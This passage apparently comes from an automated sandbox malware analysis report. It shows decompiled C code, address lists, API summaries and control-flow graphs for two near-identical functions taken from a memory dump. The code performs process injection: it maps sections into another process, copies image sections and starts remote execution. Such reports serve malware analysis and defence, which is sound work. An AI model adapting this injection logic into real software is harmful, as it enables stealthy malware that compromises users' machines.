												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t184);
										_t175 = 0;
										__eflags = 0;
										_t111 = _t198 - 4;
										 *_t111 = 0;
										 *((intOrPtr*)(_t131 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0, _t184[0xa] +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t111, 0);
									} else {
										L53();
										_pop(_t178);
										_t175 = _t178 - 0x1781;
										 *((intOrPtr*)(_t175 + 0x17b5)) = _t175 + 0x2c1d;
										E00401256(_t131, _t175 + 0x17b5, _t175, _t184, _t225, _t175 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17da)) = _t175 + 0x2c6d;
										_t159 =  *(_t198 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t94 =  *_t201;
				_t202 =  &(_t201[1]);
				_push(0x37e);
				_t134 =  *_t202;
				return E004011BB(_t94, _t134, _t159, _t175, _t184, _t225, _t226);
			}













































                                                              0x004014db
                                                              0x004014db
                                                              0x004014dc
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 9918b791cbb1f0ff44df8d0300a116fe7034d9304c3fa806413ff11951633f60
                                                              • Instruction ID: 3d44a7bbcb2d413b89cc6d66608d23a65ef9d07510e7ee37a771aa04e1e65fe6
                                                              • Opcode Fuzzy Hash: 9918b791cbb1f0ff44df8d0300a116fe7034d9304c3fa806413ff11951633f60
                                                              • Instruction Fuzzy Hash: FE5129B5900255BFEB219F91CC48FAFBBB8FF85B00F104159F911AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 165 4014ed-401519 call 4011bb 174 40151b 165->174 175 40151e-401523 165->175 174->175 177 401845-40184d 175->177 178 401529-40153a 175->178 177->175 181 401540-401569 178->181 182 401843-401852 178->182 181->182 191 40156f-401586 NtDuplicateObject 181->191 185 401868 182->185 186 401859-401864 182->186 185->186 187 40186b-40188d call 4011bb 185->187 186->187 191->182 193 40158c-4015b0 NtCreateSection 191->193 195 4015b2-4015d3 NtMapViewOfSection 193->195 196 40160c-401632 NtCreateSection 193->196 195->196 197 4015d5-4015f1 NtMapViewOfSection 195->197 196->182 198 401638-40163c 196->198 197->196 200 4015f3-401609 197->200 198->182 201 401642-401663 NtMapViewOfSection 198->201 200->196 201->182 202 401669-401685 NtMapViewOfSection 201->202 202->182 204 40168b call 401690 202->204 204->182
                                                              C-Code - Quality: 62%
                                                              			E004014ED(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t87;
				intOrPtr _t90;
				void* _t93;
				signed int _t94;
				struct _GUID _t101;
				struct _GUID _t103;
				PVOID* _t105;
				PVOID* _t107;
				signed int _t109;
				intOrPtr* _t111;
				PVOID* _t124;
				PVOID* _t126;
				intOrPtr _t130;
				void* _t134;
				signed int _t135;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				HANDLE* _t185;
				HANDLE* _t187;
				void* _t192;
				intOrPtr* _t195;
				void* _t198;
				void* _t199;
				intOrPtr* _t201;
				signed int* _t202;
				signed int* _t203;
				signed int* _t206;
				signed int* _t207;
				long _t222;

				_t227 = __fp0;
				_t160 = __edx;
				_push(0x150b);
				_t87 =  *_t201;
				_t202 = _t201 + 4;
				_t134 = 0x37e;
				E004011BB(_t87, _t134, __edx, __edi, __esi, __eflags, __fp0);
				_t130 =  *((intOrPtr*)(_t199 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t199 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
				}
				while(1) {
					_t90 =  *((intOrPtr*)(_t130 + 0x48))();
					if(_t90 != 0) {
						break;
					}
					 *((intOrPtr*)(_t130 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t199 - 0x5c)) = _t90;
				_t185 = _t199 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t130 + 0x4c))(_t90, _t185);
				_t93 =  *_t185;
				if(_t93 != 0) {
					_t136 = _t199 - 0x30;
					 *_t136 = _t93;
					_t136[1] = _t176;
					_t185 = _t199 - 0x28;
					 *((intOrPtr*)(_t130 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_t160 = _t185;
					_push(_t199 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t199 - 0x10);
					if( *((intOrPtr*)(_t130 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t199 - 8) = _t176;
						_t101 = _t199 - 0x50;
						 *(_t101 + 4) = _t176;
						 *_t101 = 0x5000;
						_t187 = _t199 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t101, 4, 0x8000000, _t176) == 0) {
							 *_t26 =  *(_t199 - 0x50);
							_t124 = _t199 - 0x44;
							 *_t124 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t124, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
								_t126 = _t199 - 0x3c;
								 *_t126 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t199 - 0xc), _t126, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
									_t198 =  *(_t199 - 0x44);
									 *((intOrPtr*)(_t130 + 0x20))(_t176, _t198, 0x104);
									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
									 *(_t199 - 8) =  *(_t199 - 8) + 1;
								}
							}
						}
						_t103 = _t199 - 0x50;
						 *(_t103 + 4) = _t176;
						 *_t103 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
						_t185 = _t199 - 0x58;
						if(NtCreateSection(_t185, 0xe, _t176, _t103, 0x40, 0x8000000, _t176) == 0 &&  *(_t199 - 8) != 0) {
							 *_t47 =  *(_t199 - 0x50);
							_t105 = _t199 - 0x48;
							 *_t105 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t105, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 4) == 0) {
								_t107 = _t199 - 0x40;
								 *_t107 = _t176;
								_t222 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t107, _t176, _t176, _t176, _t199 - 0x38, 1, _t176, 0x20);
								if(_t222 == 0) {
									L21();
									if(_t222 == 0 && _t222 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t161 =  *_t202;
									_t206 =  &(_t202[1]);
									_push(_t161);
									_t109 =  *_t206;
									_t207 =  &(_t206[1]);
									_t162 = _t161 << 5;
									_t163 = _t162 + _t109;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc3");
									_t165 = _t164 ^ 0xc66a5524;
									_t202 = _t207 - _t165;
									_t192 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
									_t143 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t166 = _t192;
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t144);
										_t202 =  &(_t202[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t185);
									_t226 =  *((intOrPtr*)(_t199 - 0x34));
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_push(_t185);
										_t160 = _t185[0xd] -  *(_t199 - 0x40);
										_t195 = _t185[0x28] +  *(_t199 - 0x48);
										__eflags = _t195;
										while(1) {
											__eflags =  *_t195;
											if( *_t195 == 0) {
												break;
											}
											_t178 =  *_t195;
											_t195 = _t195 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t160;
												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t185);
										_t176 = 0;
										__eflags = 0;
										_t111 = _t199 - 4;
										 *_t111 = 0;
										 *((intOrPtr*)(_t130 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0, _t185[0xa] +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t111, 0);
									} else {
										L54();
										_pop(_t179);
										_t176 = _t179 - 0x1781;
										 *((intOrPtr*)(_t176 + 0x17b5)) = _t176 + 0x2c1d;
										E00401256(_t130, _t176 + 0x17b5, _t176, _t185, _t226, _t176 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t176 + 0x17da)) = _t176 + 0x2c6d;
										_t160 =  *(_t199 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t94 =  *_t202;
				_t203 =  &(_t202[1]);
				_push(0x37e);
				_t135 =  *_t203;
				return E004011BB(_t94, _t135, _t160, _t176, _t185, _t226, _t227);
			}











































                                                              0x004014ed
                                                              0x004014ed
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: f7fdfd08fcb8eed158454bdf17d9c406f3432810bc7538c0baa4c61a2813e87b
                                                              • Instruction ID: 56051b854cc78bb7cf401cc86fa9e38e91d39254f0b1df9b0b50e8092bc8a5cc
                                                              • Opcode Fuzzy Hash: f7fdfd08fcb8eed158454bdf17d9c406f3432810bc7538c0baa4c61a2813e87b
                                                              • Instruction Fuzzy Hash: 985119B5900255BFEB219F91CC48FAB7BB8FF85B00F104169F911AA2E5D6749A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004014F0 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 206 4014f0-401519 call 4011bb 213 40151b 206->213 214 40151e-401523 206->214 213->214 216 401845-40184d 214->216 217 401529-40153a 214->217 216->214 220 401540-401569 217->220 221 401843-401852 217->221 220->221 230 40156f-401586 NtDuplicateObject 220->230 224 401868 221->224 225 401859-401864 221->225 224->225 226 40186b-40188d call 4011bb 224->226 225->226 230->221 232 40158c-4015b0 NtCreateSection 230->232 234 4015b2-4015d3 NtMapViewOfSection 232->234 235 40160c-401632 NtCreateSection 232->235 234->235 236 4015d5-4015f1 NtMapViewOfSection 234->236 235->221 237 401638-40163c 235->237 236->235 239 4015f3-401609 236->239 237->221 240 401642-401663 NtMapViewOfSection 237->240 239->235 240->221 241 401669-401685 NtMapViewOfSection 240->241 241->221 243 40168b call 401690 241->243 243->221
                                                              C-Code - Quality: 61%
                                                              			E004014F0(void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t129;
				signed int _t130;
				void** _t131;
				signed int _t138;
				int _t139;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t161;
				intOrPtr* _t162;
				long _t171;
				intOrPtr _t173;
				void* _t174;
				HANDLE* _t180;
				HANDLE* _t182;
				void* _t187;
				intOrPtr* _t190;
				void* _t193;
				void* _t194;
				signed int* _t196;
				signed int* _t197;
				signed int* _t200;
				signed int* _t201;
				long _t216;

				_t221 = __fp0;
				_t155 = __edx;
				asm("out dx, eax");
				_t129 = 0x37e;
				E004011BB(_t84, _t129, __edx, __edi, __esi, __eflags, __fp0);
				_t127 =  *((intOrPtr*)(_t194 + 8));
				_t171 = 0;
				 *((intOrPtr*)(_t194 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t194 - 0x34)) =  *((intOrPtr*)(_t194 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t194 - 0x5c)) = _t87;
				_t180 = _t194 - 0x60;
				 *_t180 = _t171;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t131 = _t194 - 0x30;
					 *_t131 = _t90;
					_t131[1] = _t171;
					_t180 = _t194 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t180, 0x18);
					 *_t180 = 0x18;
					_t155 = _t180;
					_push(_t194 - 0x30);
					_push(_t180);
					_push(0x40);
					_push(_t194 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t194 - 0x10), 0xffffffff, 0xffffffff, _t194 - 0xc, _t171, _t171, 2) == 0) {
						 *(_t194 - 8) = _t171;
						_t98 = _t194 - 0x50;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t182 = _t194 - 0x54;
						if(NtCreateSection(_t182, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							 *_t25 =  *(_t194 - 0x50);
							_t121 = _t194 - 0x44;
							 *_t121 = _t171;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t123 = _t194 - 0x3c;
								 *_t123 = _t171;
								if(NtMapViewOfSection( *_t182,  *(_t194 - 0xc), _t123, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
									_t193 =  *(_t194 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t171, _t193, 0x104);
									 *((intOrPtr*)(_t193 + 0x208)) =  *((intOrPtr*)(_t194 + 0x14));
									 *(_t194 - 8) =  *(_t194 - 8) + 1;
								}
							}
						}
						_t100 = _t194 - 0x50;
						 *(_t100 + 4) = _t171;
						 *_t100 =  *((intOrPtr*)(_t194 + 0x10)) + 0x10000;
						_t180 = _t194 - 0x58;
						if(NtCreateSection(_t180, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 &&  *(_t194 - 8) != 0) {
							 *_t46 =  *(_t194 - 0x50);
							_t102 = _t194 - 0x48;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t102, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 4) == 0) {
								_t104 = _t194 - 0x40;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t180,  *(_t194 - 0xc), _t104, _t171, _t171, _t171, _t194 - 0x38, 1, _t171, 0x20);
								if(_t216 == 0) {
									L19();
									if(_t216 == 0 && _t216 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t156 =  *_t196;
									_t200 =  &(_t196[1]);
									_push(_t156);
									_t106 =  *_t200;
									_t201 =  &(_t200[1]);
									_t157 = _t156 << 5;
									_t158 = _t157 + _t106;
									asm("lodsb");
									_t159 = _t158;
									asm("loop 0xffffffc3");
									_t160 = _t159 ^ 0xc66a5524;
									_t196 = _t201 - _t160;
									_t187 =  *((intOrPtr*)(_t194 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc))));
									_t138 =  *(_t187 + 6) & 0x0000ffff;
									_push(_t187);
									_t161 = _t187;
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t194 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t194 + 0xc)), _t139);
										_t196 =  &(_t196[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t180);
									_t220 =  *((intOrPtr*)(_t194 - 0x34));
									if( *((intOrPtr*)(_t194 - 0x34)) == 0) {
										_push(_t180);
										_t155 = _t180[0xd] -  *(_t194 - 0x40);
										_t190 = _t180[0x28] +  *(_t194 - 0x48);
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t173 =  *_t190;
											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t155;
												__eflags =  *((intOrPtr*)(0 +  *(_t194 - 0x48) + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t180);
										_t171 = 0;
										__eflags = 0;
										_t108 = _t194 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t194 - 0xc), 0, 0, 0, 0, 0, _t180[0xa] +  *(_t194 - 0x40),  *(_t194 - 0x3c), _t108, 0);
									} else {
										L52();
										_pop(_t174);
										_t171 = _t174 - 0x1781;
										 *((intOrPtr*)(_t171 + 0x17b5)) = _t171 + 0x2c1d;
										E00401256(_t127, _t171 + 0x17b5, _t171, _t180, _t220, _t171 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t171 + 0x17da)) = _t171 + 0x2c6d;
										_t155 =  *(_t194 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t196;
				_t197 =  &(_t196[1]);
				_push(0x37e);
				_t130 =  *_t197;
				return E004011BB(_t91, _t130, _t155, _t171, _t180, _t220, _t221);
			}










































                                                              0x004014f0
                                                              0x004014f0
                                                              0x004014f0
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
